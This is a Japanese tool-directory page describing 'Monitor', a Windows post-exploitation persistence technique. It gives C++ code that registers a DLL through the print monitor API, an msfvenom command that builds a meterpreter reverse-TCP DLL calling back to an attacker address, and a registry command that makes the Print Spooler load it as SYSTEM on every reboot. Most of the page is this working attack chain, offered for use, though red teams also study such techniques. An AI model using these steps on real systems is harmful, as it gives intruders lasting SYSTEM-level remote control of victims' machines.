Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Monitor — A old way to Persistence | Kitploit
ツール/GitHubGitHub/al1ex/monitor
Privilege EscalationPayload GenerationPersistence MechanismsExploitationPost-ExploitationCommand and ControlRed Teaming
GitHubal1ex/monitor

Monitor

A old way to Persistence

リポジトリを見る
53105年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

プロジェクト概要

ポストエクスプロイテーション段階で権限を維持するために使用します。

プロジェクトの使用方法

Step1:このプロジェクトをダウンロードし、VSを使用してMonitor.cppをコンパイルします。もちろん、コンパイル済みのものを使用しても構いません。Monitor.cppのコードは以下の通りです:

root@kitploit:~
#include "Windows.h"

int main() {
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("Monitor");
	TCHAR dll[12] = TEXT("test.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}
  • pName //モニター名
  • pEnvironment //環境アーキテクチャ
  • pDLLName //モニターDLLファイルの名前

Step 2:Msfvenomを使用してDLL攻撃ペイロードを生成します:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll > shell.dll

test_dll

Step 3:shell.dllをターゲットホストのsystem32ディレクトリにコピーし、その後test.dllに名前を変更します(つまり上記のPDLLNameです。自分で好きな名前に変更しても構いません。とにかく自由です):

root@kitploit:~
copy C:\temp\shell.dll C:\Windows\System32\test.dll

copy

Step 4:その後、system32ディレクトリに移動し、以下のコマンドを実行します(Monitors.exeは先ほどコンパイルしたファイルです。これもsystem32ディレクトリに配置する必要があります):

root@kitploit:~
Monitors.exe

Monitor

Step 5:その後、Meterpreterセッションが正常に受信されます。

Meterpreter

永続化の実装

永続性を実現するには、"Monitors"レジストリの場所にキーを設定する必要があります:

root@kitploit:~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

その後、コマンドラインで以下のコマンドを実行して、値test.dllを含むレジストリエントリを作成します。エディタからレジストリを確認して、キーが作成されたかどうかを検証します:

root@kitploit:~
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

regedit

次回の再起動時、spoolsv.exeプロセスは、Monitorsレジストリエントリに存在し、WindowsフォルダのSystem32に保存されているすべてのドライバDLLファイルを読み込みます。下図は、MeterpreterセッションがPrint Spoolerサービス(SYSTEM)と同じレベルの特権で確立され、System32フォルダから実行されたことを示しています。

shell

ツールをダウンロード